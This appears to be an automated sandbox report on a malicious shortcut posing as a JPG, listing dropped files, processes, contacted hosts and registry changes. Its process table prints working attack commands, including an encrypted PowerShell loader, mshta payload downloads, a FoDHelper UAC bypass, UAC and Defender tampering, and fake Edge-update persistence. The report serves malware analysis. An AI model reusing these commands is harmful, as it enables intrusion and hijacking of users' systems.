Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
document.jpg.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=325, ctime=Sun Dec 31
23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\config[1].exe
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\r.bat
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\tiago.exe
|
PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x827a5401, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zj5igx1.gwe.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40241sdr.dcg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aiw1jb0v.vir.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c2oyqq5z.bt0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmbx53cn.kow.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_erisu5kg.heb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etjy0v1k.qiu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpafpudm.yfu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0cgtfcj.m11.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lz1sabhd.e23.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_muyou3cf.is2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nke5tatl.yql.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxegjbbo.vpi.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u0av1kme.pyk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvwiqscy.ntv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhw3ws4v.zlu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF5c222e.TMP
(copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\67M7P0PNVSACSNW7Q2KH.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UQMJU6NIXI1BRPTECC69.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\document.jpg
|
PNG image data, 799 x 1120, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
|
\Device\Mup\user-PC\PIPE\samr
|
GLS_BINARY_LSB_FIRST
|
dropped
|
There are 23 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Windows\System32\SyncAppvPublishingServer.vbs" ;565,571,560,572,553,488,560,572,572,568,514,503,503,513,505,502,513,506,502,506,508,512,502,507,510,503,524,567,575,566,564,567,553,556,571,503,555,567,566,558,561,559,502,557,576,557|%{$n+=[char]($_-456)};$n
| powershell -
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned
-Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer
;565,571,560,572,553,488,560,572,572,568,514,503,503,513,505,502,513,506,502,506,508,512,502,507,510,503,524,567,575,566,564,567,553,556,571,503,555,567,566,558,561,559,502,557,576,557|%{$n+=[char]($_-456)};$n
| powershell -}
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
|
|
|
|
C:\Windows\System32\mshta.exe
|
"C:\Windows\system32\mshta.exe" http://91.92.248.36/Downloads/config.exe
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $wauLzkw = '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';$OgScJgJi
= 'SkpHRVl2TnV5dFNtYW5DdHVYbGRPQk5QandWRlpOU0o=';$BwerIjm = New-Object 'System.Security.Cryptography.AesManaged';$BwerIjm.Mode
= [System.Security.Cryptography.CipherMode]::ECB;$BwerIjm.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$BwerIjm.BlockSize
= 128;$BwerIjm.KeySize = 256;$BwerIjm.Key = [System.Convert]::FromBase64String($OgScJgJi);$FfImT = [System.Convert]::FromBase64String($wauLzkw);$dpHrhAbw
= $FfImT[0..15];$BwerIjm.IV = $dpHrhAbw;$VveFZCBje = $BwerIjm.CreateDecryptor();$qFKMUzafD = $VveFZCBje.TransformFinalBlock($FfImT,
16, $FfImT.Length - 16);$BwerIjm.Dispose();$FDICvmkx = New-Object System.IO.MemoryStream( , $qFKMUzafD );$hebjfzMz = New-Object
System.IO.MemoryStream;$bIJBQdkJw = New-Object System.IO.Compression.GzipStream $FDICvmkx, ([IO.Compression.CompressionMode]::Decompress);$bIJBQdkJw.CopyTo(
$hebjfzMz );$bIJBQdkJw.Close();$FDICvmkx.Close();[byte[]] $BDYZJphM = $hebjfzMz.ToArray();$eYTnUe = [System.Text.Encoding]::UTF8.GetString($BDYZJphM);$eYTnUe
| powershell -
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ
/D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
&& FoDHelper.exe
|
|
|
|
C:\Windows\System32\reg.exe
|
REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat"
/F
|
|
|
|
C:\Windows\System32\reg.exe
|
REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
|
|
|
|
C:\Windows\System32\fodhelper.exe
|
FoDHelper.exe
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -w 1 -ep Unrestricted -nop Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
-Name ConsentPromptBehaviorAdmin -Value 0;Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming;
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT
/F
|
|
|
|
C:\Windows\System32\reg.exe
|
REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
|
|
|
|
C:\Windows\System32\reg.exe
|
REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ
/D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
&& FoDHelper.exe
|
|
|
|
C:\Windows\System32\reg.exe
|
REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat"
/F
|
|
|
|
C:\Windows\System32\reg.exe
|
REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
|
|
|
|
C:\Windows\System32\fodhelper.exe
|
FoDHelper.exe
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -w 1 -ep Unrestricted -nop schtasks.exe /TN MicrosoftEdgeUpdateTaskMachine /CREATE /F /TR C:\Users\user\AppData\Roaming\tiago.exe
/SC ONLOGON
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT
/F
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /TN MicrosoftEdgeUpdateTaskMachine /CREATE /F /TR C:\Users\user\AppData\Roaming\tiago.exe
/SC ONLOGON
|
|
|
|
C:\Windows\System32\reg.exe
|
REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
|
|
|
|
C:\Windows\System32\reg.exe
|
REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ
/D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
&& FoDHelper.exe
|
|
|
|
C:\Windows\System32\reg.exe
|
REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat"
/F
|
|
|
|
C:\Windows\System32\reg.exe
|
REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
|
|
|
|
C:\Windows\System32\fodhelper.exe
|
FoDHelper.exe
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat"
|
|
|
|
C:\Users\user\AppData\Roaming\tiago.exe
|
C:\Users\user\AppData\Roaming\tiago.exe
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT
/F
|
|
|
|
C:\Windows\System32\reg.exe
|
REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
|
|
|
|
C:\Windows\System32\reg.exe
|
REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 41 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://91.92.248.36/Downloads/config
|
unknown
|
|
|
|
http://91.92.248.36/Downloads/conf
|
unknown
|
|
|
|
http://91.92.248.36/Down
|
unknown
|
|
|
|
http://91.92.248.36/Downlo
|
unknown
|
|
|
|
http://91.92.248.36/Downl
|
unknown
|
|
|
|
http://91.92.248.36/Downloads/con
|
unknown
|
|
|
|
http://91.92.248.36/Downloads
|
unknown
|
|
|
|
http://91.92.248
|
unknown
|
|
|
|
http://91.92.248.36/D
|
unknown
|
|
|
|
http://91.92.248.36
|
unknown
|
|
|
|
http://91.92.248.36/Downloads/confi
|
unknown
|
|
|
|
http://91.9
|
unknown
|
|
|
|
http://91.92.248.36/Downloads/config.ex
|
unknown
|
|
|
|
http://91.92.248.36/Downloads/
|
unknown
|
|
|
|
http://91.92.248.36/Dow
|
unknown
|
|
|
|
http://91.92.248.36/Downloads/config.e
|
unknown
|
|
|
|
http://91.92.248.36/Download
|
unknown
|
|
|
|
http://91.92.
|
unknown
|
|
|
|
http://91.92.248.3
|
unknown
|
|
|
|
http://91.92.248.
|
unknown
|
|
|
|
http://91.92.248.36/
|
unknown
|
|
|
|
http://91.92.248.36/Downloads/c
|
unknown
|
|
|
|
http://91.92.248.36/Do
|
unknown
|
|
|
|
http://91.92
|
unknown
|
|
|
|
http://91.92.248.36/Downloads/config.
|
unknown
|
|
|
|
http://91.92.2
|
unknown
|
|
|
|
http://91.92.248.36/Downloa
|
unknown
|
|
|
|
http://91.92.24
|
unknown
|
|
|
|
http://91.92.248.36/Downloads/co
|
unknown
|
|
|
|
http://91.92.248.36/Downloads/config.exe
|
91.92.248.36
|
|
|
|
http://91.92.248.36/Downloads/config.exe5t
|
unknown
|
||
|
http://91.92.248.36/Downloads/config.exe$global:?
|
unknown
|
||
|
http://91.92.248.36/Downloads/config.exeLE_STRING7
|
unknown
|
||
|
http://91.92.248.36/Downloads/config.exe...d
|
unknown
|
||
|
http://91.92.248.36/Downloads/config.exeC:
|
unknown
|
||
|
http://91.92.248.36/Downloads/config.exeFr
|
unknown
|
||
|
http://91.92.248.36/Downloads/config.exeq
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
http://sensor.fun
|
unknown
|
||
|
http://91.92.248.36/Downloads/config.exe...
|
unknown
|
||
|
http://sensor.fun/tiago.exe
|
194.190.152.129
|
||
|
http://urler.site/document.jpg
|
194.190.152.246
|
||
|
http://91.92.248.36/Downloads/config.exe&
|
unknown
|
||
|
http://crl.micft.cMicRosof
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://csoft.com/pki/crls/MicRooCerAut_23.crl0Z
|
unknown
|
||
|
http://91.92.248.36/Downloads/config.exeJ
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://91.92.248.36/Downloads/config.exeMB
|
unknown
|
||
|
http://91.92.248.36/Downloads/config.exehttp://91.92.248.36/Downloads/config.exe
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://91.92.248.36/Downloads/config.exeE
|
unknown
|
||
|
http://91.92.248.36/Downloads/config.exeH
|
unknown
|
||
|
http://crl.mic
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
http://www.microsoft.
|
unknown
|
||
|
http://91.92.248.36/Downloads/config.exe0
|
unknown
|
||
|
http://sensor.fun/tiago.exep
|
unknown
|
||
|
http://urler.site
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod/C:
|
unknown
|
||
|
http://wwoft.com/pkiops/cWinProPCA2011_20.crt0
|
unknown
|
||
|
http://crlft.com/pki/crl/pMicRooCerAut_201crl0Z
|
unknown
|
||
|
http://91.92.248.36/Downloads/config.exef
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
http://wwwft.com/pkiops/crProPCA2011_2011-l0a
|
unknown
|
||
|
http://91.92.248.36/Downloads/config.exe&r
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://osoft.com/pki/ceooCerAut_2010-068
|
unknown
|
||
|
http://crl.micros
|
unknown
|
There are 59 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
sensor.fun
|
194.190.152.129
|
||
|
urler.site
|
194.190.152.246
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
91.92.248.36
|
unknown
|
Bulgaria
|
|
|
|
194.190.152.246
|
urler.site
|
Russian Federation
|
||
|
194.190.152.129
|
sensor.fun
|
Russian Federation
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\ServiceHostXGRT\Shell\Open\Command
|
NULL
|
||
|
HKEY_CURRENT_USER_Classes\MS-Settings\CurVer
|
NULL
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Users\user\AppData\Local\Temp\r.bat.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Users\user\AppData\Local\Temp\r.bat.ApplicationCompany
|
||
|
HKEY_CURRENT_USER_Classes\ServiceHostXGRT\Shell\Open\Command
|
NULL
|
||
|
HKEY_CURRENT_USER_Classes\MS-Settings\CurVer
|
NULL
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Users\user\AppData\Local\Temp\r.bat.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
|
SlowContextMenuEntries
|
||
|
HKEY_CURRENT_USER_Classes\ServiceHostXGRT\Shell\Open\Command
|
NULL
|
||
|
HKEY_CURRENT_USER_Classes\MS-Settings\CurVer
|
NULL
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Users\user\AppData\Local\Temp\r.bat.ApplicationCompany
|
There are 16 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
107A000
|
unkown
|
page readonly
|
|
|
|
107A000
|
unkown
|
page readonly
|
|
|
|
7FF8491C0000
|
trusted library allocation
|
page read and write
|
||
|
1EE68F36000
|
trusted library allocation
|
page read and write
|
||
|
2349BE28000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
234ABCC0000
|
trusted library allocation
|
page read and write
|
||
|
2627CDD0000
|
direct allocation
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1F8C0267000
|
heap
|
page read and write
|
||
|
234B3E97000
|
heap
|
page read and write
|
||
|
25D70296000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
13FBBBC9000
|
heap
|
page read and write
|
||
|
C0000AA000
|
direct allocation
|
page read and write
|
||
|
25390BA0000
|
heap
|
page read and write
|
||
|
1F0BF1C0000
|
heap
|
page read and write
|
||
|
D94A5BE000
|
unkown
|
page read and write
|
||
|
2349B820000
|
heap
|
page execute and read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
C00008A000
|
direct allocation
|
page read and write
|
||
|
25D70294000
|
heap
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
13FA3300000
|
heap
|
page read and write
|
||
|
1F8C024F000
|
heap
|
page read and write
|
||
|
1F8C03D8000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
C0002B0000
|
direct allocation
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
25D72187000
|
heap
|
page read and write
|
||
|
1F8C0451000
|
heap
|
page read and write
|
||
|
25D71B50000
|
heap
|
page read and write
|
||
|
23499CB0000
|
heap
|
page read and write
|
||
|
7FF8491A9000
|
trusted library allocation
|
page read and write
|
||
|
26257435000
|
heap
|
page read and write
|
||
|
ABCCCFC000
|
stack
|
page read and write
|
||
|
1D548A40000
|
heap
|
page read and write
|
||
|
C2017E000
|
stack
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
234B3E0A000
|
heap
|
page read and write
|
||
|
232640D0000
|
remote allocation
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
